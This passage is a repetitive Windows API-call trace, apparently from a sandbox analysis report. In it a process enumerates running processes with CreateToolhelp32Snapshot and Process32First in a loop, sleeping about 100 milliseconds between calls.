th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.401] Sleep (dwMilliseconds=0x64) [0241.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0241.415] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.480] Sleep (dwMilliseconds=0x64) [0241.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0241.499] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.579] Sleep (dwMilliseconds=0x64) [0241.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0241.597] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.780] Sleep (dwMilliseconds=0x64) [0241.782] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0241.800] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.891] Sleep (dwMilliseconds=0x64) [0241.894] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0241.919] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.008] Sleep (dwMilliseconds=0x64) [0242.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0242.047] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.137] Sleep (dwMilliseconds=0x64) [0242.140] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0242.159] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.280] Sleep (dwMilliseconds=0x64) [0242.283] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0242.298] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.357] Sleep (dwMilliseconds=0x64) [0242.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0242.376] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.455] Sleep (dwMilliseconds=0x64) [0242.459] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0242.483] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.555] Sleep (dwMilliseconds=0x64) [0242.557] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0242.571] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.643] Sleep (dwMilliseconds=0x64) [0242.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0242.659] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.737] Sleep (dwMilliseconds=0x64) [0242.741] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0242.755] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.850] Sleep (dwMilliseconds=0x64) [0242.853] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0242.869] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.966] Sleep (dwMilliseconds=0x64) [0242.968] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0242.988] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.096] Sleep (dwMilliseconds=0x64) [0243.099] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0243.114] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.173] Sleep (dwMilliseconds=0x64) [0243.175] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0243.186] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.291] Sleep (dwMilliseconds=0x64) [0243.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0243.308] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.387] Sleep (dwMilliseconds=0x64) [0243.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0243.401] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.467] Sleep (dwMilliseconds=0x64) [0243.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0243.484] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.560] Sleep (dwMilliseconds=0x64) [0243.576] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0243.599] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.675] Sleep (dwMilliseconds=0x64) [0243.678] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0243.695] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.792] Sleep (dwMilliseconds=0x64) [0243.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0243.809] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.919] Sleep (dwMilliseconds=0x64) [0243.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0243.947] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.025] Sleep (dwMilliseconds=0x64) [0244.029] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2444 [0244.106] Process32First (in: hSnapshot=0x2444, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.187] Sleep (dwMilliseconds=0x64) [0244.302] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0244.333] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.405] Sleep (dwMilliseconds=0x64) [0244.409] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0244.425] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.487] Sleep (dwMilliseconds=0x64) [0244.489] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0244.502] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.559] Sleep (dwMilliseconds=0x64) [0244.560] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0244.572] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.627] Sleep (dwMilliseconds=0x64) [0244.629] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0244.642] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.700] Sleep (dwMilliseconds=0x64) [0244.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0244.713] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.789] Sleep (dwMilliseconds=0x64) [0244.791] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0244.804] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.860] Sleep (dwMilliseconds=0x64) [0244.862] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0244.876] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.953] Sleep (dwMilliseconds=0x64) [0244.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0244.971] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.045] Sleep (dwMilliseconds=0x64) [0245.125] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0245.176] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.337] Sleep (dwMilliseconds=0x64) [0245.339] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0248.365] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.488] Sleep (dwMilliseconds=0x64) [0248.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0248.507] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.567] Sleep (dwMilliseconds=0x64) [0248.568] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0248.580] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.633] Sleep (dwMilliseconds=0x64) [0248.643] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0248.653] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.705] Sleep (dwMilliseconds=0x64) [0248.707] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0248.717] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.771] Sleep (dwMilliseconds=0x64) [0248.773] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0248.782] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.833] Sleep (dwMilliseconds=0x64) [0248.835] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0248.855] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.908] Sleep (dwMilliseconds=0x64) [0248.909] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0248.920] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.978] Sleep (dwMilliseconds=0x64) [0248.980] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0249.024] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.093] Sleep (dwMilliseconds=0x64) [0249.095] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0249.106] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.210] Sleep (dwMilliseconds=0x64) [0249.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0249.225] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.276] Sleep (dwMilliseconds=0x64) [0249.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0249.290] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.342] Sleep (dwMilliseconds=0x64) [0249.345] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240c [0249.357] Process32First (in: hSnapshot=0x240c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.499] Sleep (dwMilliseconds=0x64) [0249.503] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0249.518] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.605] Sleep (dwMilliseconds=0x64) [0249.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0249.629] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.697] Sleep (dwMilliseconds=0x64) [0249.698] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0249.709] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.765] Sleep (dwMilliseconds=0x64) [0249.773] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0249.786] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.844] Sleep (dwMilliseconds=0x64) [0249.846] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0249.858] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.915] Sleep (dwMilliseconds=0x64) [0249.917] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0249.935] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.019] Sleep (dwMilliseconds=0x64) [0250.021] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0250.036] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.092] Sleep (dwMilliseconds=0x64) [0250.094] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0250.105] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.179] Sleep (dwMilliseconds=0x64) [0250.181] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0250.206] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.277] Sleep (dwMilliseconds=0x64) [0250.279] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0250.294] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.372] Sleep (dwMilliseconds=0x64) [0250.373] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0250.433] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.552] Sleep (dwMilliseconds=0x64) [0250.555] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 